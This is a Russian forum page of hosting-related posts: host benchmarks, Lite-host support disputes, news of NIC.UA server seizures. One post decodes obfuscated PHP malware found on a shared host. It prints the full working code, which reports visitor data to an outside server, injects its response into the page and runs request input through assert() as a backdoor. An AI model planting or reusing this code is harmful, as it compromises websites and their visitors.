Здравствуйте, гость Вход | Регистрация
Наши новости:
|
| Дата поста: | В теме: | За сообщение: | Спасибо сказали: | ||
|---|---|---|---|---|---|
| 19.6.2015, 11:06 | Large host | ![]() Тест s1.large-host.net. По теме все сайты лежат на обычной KVM VPSке с 3 ядрами и 6 ГБ памяти. Все ПО из коробки не настроено даже, не говоря о том что версия PHP 5.3.* старая. Новая PHP 5.3.29 в этой ветке т.е. сервер даже не обновляли не разу. ДЦ Adman: adman.com Для сравнения тест s3.lite-host.ru при включенном php 5.3: ![]() Тесты по другим хостерам можно посмотреть тут: |
XyLiGaN | ||
| 15.6.2015, 21:08 | Lite-host | Легкий хостинг сайтов | magis1337, Я описал возможные варианты. Ваша ситуация скорей всего под номером 2. В тикет вы написали постфактум, даже не пытаясь разобраться с ситуацией. Такие вопросы не решаются на форумах и я не гарантирую что на форумах вы получите полный ответ. По факту ошибки никакой в ситуации не было. Вы используете общий IP, что само собой подразумевает что им пользуются и другие клиенты. Панель ISPmanager автоматом создает дефолтный сайт для IP и т.к. на сервер выделяется 5 общих адресов их может занять любой. Повторюсь услуга выделенный IP стоит денег т.к. сами IP стоят денег (1000 евро в год за /22 у RIPE, аренда их стоит дороже). Из-за исчерпания доступных IP невозможно давать каждому клиенту выделенный IP тем более при таком подходе к тарифам добавится стоимость самого IP. |
XyLiGaN | ||
| 18.5.2015, 16:13 | Lite-host | Легкий хостинг сайтов | Ответил в тикете. |
3aB}{o3 | ||
| 16.5.2015, 22:54 | Смешные и забавные картинки | ![]() Ну ок |
XyLiGaN | ||
| 14.5.2015, 15:53 | Lite-host | Легкий хостинг сайтов | Добрый день, уважаемые клиенты! В этот приятный, теплый, весенний день мы хотим сообщить вам приятную новость. Нам исполняется 3 года! В честь данного события мы хотим порадовать вас следующими изменениями:
Всем удачных заказов и побольше АПТАЙМА на Ваших сайтах! С Уважением, Всегда ваши Lite-Host LTD. |
Bloo, Nixon, XyLiGaN, Евгений_2 | ||
| 29.4.2015, 16:53 | Тестируем мастерсервера сами, пособие для исследователей. | Раз уже речь пошла о client_save, то Код "../client_save.dll" F70E24FE980C8EB0AF3ABBE577FC533F "amx_ms %userid% cs-exes.ru |
filip | ||
| 20.4.2015, 11:52 | Смешные и забавные картинки | У меня 1 вопрос - зачем? Скрытый текст ![]() |
Bloo | ||
| 13.4.2015, 15:05 | Распространенные DDOS атаки и методы противодействия. | XyLiGaN | |||
| 13.4.2015, 9:51 | Расшифруйте пожалуйста, код появился в файлах на виртуальном хостинге | Rot13->base64-> Скрытый текст Код $GLOBALS['_388174767_']=Array(base64_decode('cHJlZ' .'19' .'tYXRjaA=='),base64_decode('ZmlsZV9nZXRfY29udGVudHM='),base64_decode('YXJy' .'YXlf' .'cmV2ZXJz' .'ZQ=='),base64_decode('' .'Z' .'nVuY3' .'Rpb25f' .'ZXhpc' .'3Rz'),base64_decode('Y' .'3' .'VybF9pbml0'),base64_decode('dXJsZW5jb2Rl'),base64_decode('dX' .'J' .'sZ' .'W5j' .'b2R' .'l'),base64_decode('bWQ1'),base64_decode('' .'Y3' .'Vyb' .'F9' .'zZXRvcHQ='),base64_decode('' .'Y3V' .'y' .'bF' .'9' .'zZ' .'XRv' .'cHQ='),base64_decode('Y' .'3' .'V' .'ybF9leG' .'Vj'),base64_decode('' .'YX' .'J' .'y' .'YXlfZGlmZ' .'l91a' .'2V' .'5'),base64_decode('Y3VybF' .'9jbG9' .'zZQ=='),base64_decode('aW' .'5p' .'X2dldA=='),base64_decode('Z' .'mlsZ' .'V9nZXRf' .'Y29udGV' .'u' .'dHM='),base64_decode('' .'d' .'X' .'JsZW' .'5jb' .'2R' .'l'),base64_decode('dX' .'J' .'sZW5jb' .'2Rl'),base64_decode('b' .'WQ' .'1'),base64_decode('Y' .'XNzZX' .'J0')); function _801666531($i){$a=Array('Y2xp' .'ZW50X2NoZWNr','Y2xp' .'ZW5' .'0X2N' .'oZWN' .'r','SFRUUF9' .'BQ0NFU' .'F' .'R' .'fQ0hBU' .'l' .'NFV' .'A=' .'=','IS4hdQ==','U0NSSVBUX0ZJTEVOQU1' .'F','VVRGLTg=','' .'d' .'2' .'l' .'uZ' .'G93' .'cy' .'0' .'xMjUx','SFRUUF9BQ0NFUFRfQ' .'0hBUl' .'NFVA==','' .'Y3Vy' .'bF9pbml0','' .'aHR0cDo' .'vL2' .'15a' .'W5kZXg' .'u' .'bmFtZ' .'S9n' .'ZXQ' .'ucGhwP2Q9','U' .'0' .'VSV' .'kVSX05BTUU=','UkVRVUVTVF' .'9VUk' .'k=','JnU9','SFR' .'UUF' .'9VU0VSX0FHR' .'U' .'5U','JmM' .'9','Jm' .'k' .'9' .'MSZpcD0=','UkVNT1R' .'FX0FERFI=','Jm' .'g9','' .'N' .'DUxN' .'mI3NDdhNzc4ZGI2ZTFjN' .'zQ' .'0Y' .'W' .'E3YWY3M2E' .'zNTU=','U0V' .'SVkVSX0' .'5BTUU=','UkVRVU' .'VTVF9VUkk=','SFRUUF' .'9' .'VU0VSX0FHRU5U','MQ' .'==','aA==','YWxsb' .'3dfdXJsX2Zv' .'c' .'GVu','aHR0c' .'DovL215' .'aW' .'5kZXgubm' .'FtZS9nZ' .'XQu' .'cGhwP2' .'Q9','' .'U0VSVkVSX05BTU' .'U' .'=','UkVRVUVTVF9V' .'U' .'kk=','Jn' .'U9','SFRUUF9VU0V' .'SX0FHRU5U','JmM9','Jmk9MSZpc' .'D0=','UkVNT1RFX0FER' .'FI=','Jmg9','' .'NDUxNmI3' .'NDdhN' .'z' .'c4Z' .'GI2ZT' .'FjNzQ0YWE3YWY3M2E' .'zNTU=','' .'U' .'0VSVkV' .'SX0' .'5BT' .'U' .'U=','UkVRVUVTVF' .'9VUkk' .'=','SFRU' .'UF' .'9VU0V' .'SX0' .'FHRU' .'5U','MQ==','' .'cA==','cA==','ODJlZDM1N2E' .'=','Yw==');return base64_decode($a[$i]);} if(!empty($_COOKIE[_801666531(0)]))die($_COOKIE[_801666531(1)]);if(!isset($icb2d_0[_801666531(2)])){if($GLOBALS['_388174767_'][0](_801666531(3),$GLOBALS['_388174767_'][1]($_SERVER[_801666531(4)]))){$icb2d_1=_801666531(5);}else{$icb2d_1=_801666531(6);}}else{$icb2d_1=$icb2d_0[_801666531(7)];while(round(0+419+419+419+419)-round(0+335.2+335.2+335.2+335.2+335.2))$GLOBALS['_388174767_'][2]($_COOKIE);}if($GLOBALS['_388174767_'][3](_801666531(8))){$icb2d_2=$GLOBALS['_388174767_'][4](_801666531(9) .$GLOBALS['_388174767_'][5]($_SERVER[_801666531(10)] .$_SERVER[_801666531(11)]) ._801666531(12) .$GLOBALS['_388174767_'][6]($_SERVER[_801666531(13)]) ._801666531(14) .$icb2d_1 ._801666531(15) .$_SERVER[_801666531(16)] ._801666531(17) .$GLOBALS['_388174767_'][7](_801666531(18) .$_SERVER[_801666531(19)] .$_SERVER[_801666531(20)] .$_SERVER[_801666531(21)] .$icb2d_1 ._801666531(22)));$GLOBALS['_388174767_'][8]($icb2d_2,round(0+8.4+8.4+8.4+8.4+8.4),false);$GLOBALS['_388174767_'][9]($icb2d_2,round(0+19913),true);echo $GLOBALS['_388174767_'][10]($icb2d_2);while(round(0+2023+2023)-round(0+809.2+809.2+809.2+809.2+809.2))$GLOBALS['_388174767_'][11]($_REQUEST,$icb2d_2);$GLOBALS['_388174767_'][12]($icb2d_2);$icb2d_3=_801666531(23);}elseif($GLOBALS['_388174767_'][13](_801666531(24))==round(0+1)){echo $GLOBALS['_388174767_'][14](_801666531(25) .$GLOBALS['_388174767_'][15]($_SERVER[_801666531(26)] .$_SERVER[_801666531(27)]) ._801666531(28) .$GLOBALS['_388174767_'][16]($_SERVER[_801666531(29)]) ._801666531(30) .$icb2d_1 ._801666531(31) .$_SERVER[_801666531(32)] ._801666531(33) .$GLOBALS['_388174767_'][17](_801666531(34) .$_SERVER[_801666531(35)] .$_SERVER[_801666531(36)] .$_SERVER[_801666531(37)] .$icb2d_1 ._801666531(38)));}if(isset($_REQUEST[_801666531(39)])&& $_REQUEST[_801666531(40)]== _801666531(41)){@$GLOBALS['_388174767_'][18]($_REQUEST[_801666531(42)]);} base64-> Скрытый текст Код $GLOBALS['_388174767_']=Array(preg_match,file_get_contents,array_reverse,function_exists,curl_init,urlenco de,urlencode,md5,curl_setopt,curl_setopt,file_get_contents) Дальше идет запрос к функции : function _801666531($i){$a=Array(client_checkclient_checkHTTP_ACCEPT_CHARSET!.!uSCRIPT_FILENAMEUTF-8windows-1251HTTP_ACCEPT_CHARSETcurl_inithttp://myindex.name/get.php?d=SERVER_NAMEREQUEST_URI&u=HTTP_USER_AGENT&c=&i=1&ip=REMOTE_ADDR&h=4516b747a778db6e1c744aa7af73a355SERVER_NAMEREQUEST_URIHTTP_USER_AGENT1hall ow_url_fopenhttp://myindex.name/get.php?d=SERVER_NAMEREQUEST_URI&u=HTTP_USER_AGENT&c=&i=1&ip=REMOTE_ADDR&h=4516b747a778db6e1c744aa7af73a355SERVER_NAMEREQUEST_URIHTTP_USER_AGENT1pp82 ed357ac);return base64_decode($a[$i]);} |
3aB}{o3 | ||
| 8.4.2015, 20:22 | Соц. сеть - ВКонтакте | ![]() И снова в топе хэштег #вкживи ![]() |
sashkaa | ||
| 7.4.2015, 15:48 | Силовики изымают серверы крупного регистратора NIC.UA | Пошли очередные изъятия серверов на/в Украине? Цитата Представители СБУ провели обыск и изъятие серверов крупного доменного регистратора NIC.UA из дата-центра. Об этом представители компании сообщили в Twitter: «Сейчас госорганы изымают наши хостинг-серверы из дата-центра, из-за этого у многих возникли проблемы с хостингом. Будем держать вас в курсе». Позднее компания пообещала, что с сайтами клиентов проблем быть не должно: «Домены работают и будут работать исправно». Сайты, которые использовали хостинг, уже недоступны. Полная статья: http://ain.ua/2015/04/07/574157 P.s. А я только подумывал разместить там пару своих серверов... |
DDoS, DeLuxe, FleXer, magis1337, ssx, XyLiGaN | ||
| 3.4.2015, 13:18 | lite-host - sql | Надеюсь ни кто не закидает тапками?) Но уже в течении трёх лет держу форум,сайт,стату,бан лист на Best-hoster.ru И не знаю ни каких проблем) Ни проблем с парковой доменов, ни с проблемой нагрузки на тариф. Но скажу честно дороже чем за 49 рублей. Но это того стоит) Тут проблема не с парковкой, а скорей с незнанием как это делать. Проблемы нагрузки на тариф нет. Стоит Cloudlinux выше тарифа в этом случае не прыгнуть, но и превышений по тарифу тоже не будет. Оффтоп держу на webhost1.ru за 50 рублей, ни разу не было проблем. Насколько я вижу у них минимальный тариф сейчас как и у best-hoster - 100 рублей/месяц |
7entol | ||
| 3.4.2015, 12:52 | lite-host - sql | Особо веселит: Цитата Дорого! 2% за малейший ddos выгоняют с хостинга 32% Мой блог проработал у них 2 месяца, затем что-то у них сбилось и я потерял все что написал. Ни сайта, ни бекапа. 15% 1) 49 рублей - дорого? Если да, то добро пожаловать в оверселл т.к. железо нынче стоит дороже. 2) За 3 года не выгоняли ни 1 клиента по этой причине. В России даже предоставляем бесплатно защиту на сервере s3 от фирмы DDoS-Guard. Ни 1 компания этим бесплатно заниматься не будет, тем более при цене в 49 рублей/мес за минимальный тариф. 3) Тут спорно. Мы не обязаны делать бэкапы и они НЕ ВХОДЯТ в стоимость услуг, данное прописано в правилах хостинга. На тот момент в сервере вышло из строя оба жестких диска в raid1, данные в этом случае восстановить не удалось. Цитата Сайты медленно грузятся 29% Если это так, то напишите в тикет - проверим почему. Ресурсы выделяются гарантированно на 1 аккаунт в соответствии с тарифным планом. См. лимит на процессор. P.s. Есть еще одна компания/фирма с названием Lite-Host.IN |
evil, XyLiGaN | ||
| 25.3.2015, 0:09 | Раздача Торрент через VPS | transmission в руки |
Kazya | ||
| 5.3.2015, 1:35 | TiweHost быстрый надежный хостинг с защитой от ddos | Мне кажется или не тот раздел? Если кому-то интересно тест данного хостинга http://host-test.ru/profile/17-TiweHost Проект в beta тесте поэтому инфы не много. P.s. Цитата Стоить мощная Ddos защита в 500 гиг. Что? С каких пор на/в Украине есть защита от DDoS атак? 31.41.216.69 принадлежит ON-LINE Ltd BESTHOSTING-NET3 P.s.s. Цитата Этому способствует специально разработанная архитектура хостинга высокой отказоустойчивости, использующая механизм кэширования и отдачи статической информации с высокой скоростью. Поставили nginx и xcache? |
XyLiGaN | ||
| 2.3.2015, 5:57 | оборудование для сервера | Конфиг: 2x Intel Xeon E5-2660 (16 ядер, 32 потока), 32 Gb Ram, 4x2 TB SATA Raid 1+0 ![]() Держит 40 серверов по 32 слота. Отсюда можно рассчитать сколько вам нужно. |
default1k, Jlx7, XyLiGaN | ||
| 23.2.2015, 21:54 | Lite-host | Легкий хостинг сайтов | Эм, как бы взял тестовый период для проверки. Первый раз так грубо мне ответили. Но хотя бы помогли. Вы просто попали под горячую руку. Не спорю такого быть не должно, но все мы люди. Смысл тут даже не в том что это нужно оплачивать, а в том что не нужно думать раз все оплачено значит я царь бог. Повторюсь. Первостепенная задача хостинга - предоставление качественных ресурсов и окружения, но никак не правка скриптов и ошибок. Да, не спорю, есть ошибки которые попадают под категорию ошибка настройки, но 99% остальных ошибок можно исправить самостоятельно, только лишь загуглив саму ошибку. Тем более мы предоставляем все средства для гибкости настроек и избежания большинства таковых ошибок. Если ошибка попадает под тот 1%, то и ответ будет соответствующим (четким и по делу). |
San4aus | ||
| 23.2.2015, 21:37 | Lite-host | Легкий хостинг сайтов | Обратился короче в ТП, т.к. ошибка на Кс бансе вылезла. Была она также на предыдущем хостинге. В общем сравнения ТП: Lite Host [attachment=31373:__________2.png] Beget [attachment=31374:__________.png] Ошибка Non-static method Config::getStatus() should not be called statically, assuming $this from incompatible context P.S. Остался бы на Бегет, но МП не подружились с ним. Понимаю, что тестовый период. Не все за вас обязана делать Тех поддержка. Тем более. Идем в гугл: https://www.google.ru/webhp?sourceid=chrome...ext&es_th=1 Открываем первую ссылку: http://stackoverflow.com/questions/2584631...patible-context Видим: You probably have PHP running with E_STRICT error reporting. Try turning it off and see if that fixed the problem - like turn of error reporting for E_STRICT errors Идем в "Выбор версии PHP" -> php.ini и меняем error_reporting на ~E_ALL. После этого ошибка не будет появляться. О чем это я? Учимся думать своей головой за себя, ну и гуглить. |
San4aus | ||
| 16.2.2015, 8:36 | Многобайт | Цитата 16.02.2015 ночью несколько минут фиксировалась проблема с доступностью из некоторых направлений части IP-сетей МногоБайт, возникшая по причине некорректной работы ПО маршрутизатора одного из наших апстримов: маршруты МногоБайт распространялись через сеть апстрима в остальной мир, хотя в этот момент времени BGP-сессия с данным апстримом находилась в состоянии «down». Именно отключение BGP-сессии и послужило возникновению проблемы, хотя по логике работы протокола ее быть не должно. Сетевыми инженерами МногоБайт оперативно был открыт кейс у апстрима. Совместно со специалистами апстрима проблема была устранена через несколько минут. Нам также стало известно, что вендору известно о проблеме в ПО и в ближайшее время она будет решена. Мы не ожидаем повторения данной ситуации. |
badboy2115, BariN, evil, Rotterdam, San4aus, XyLiGaN | ||
| 15.2.2015, 20:49 | Помощь, лайт-хост | При создании поддомена, нужно указать поддомен в псевдонимах основного домена. Автоподдомены в данном случае включаются в отдельной папке. Данные вопросы лучше задавать в биллинге. |
dgfaf | ||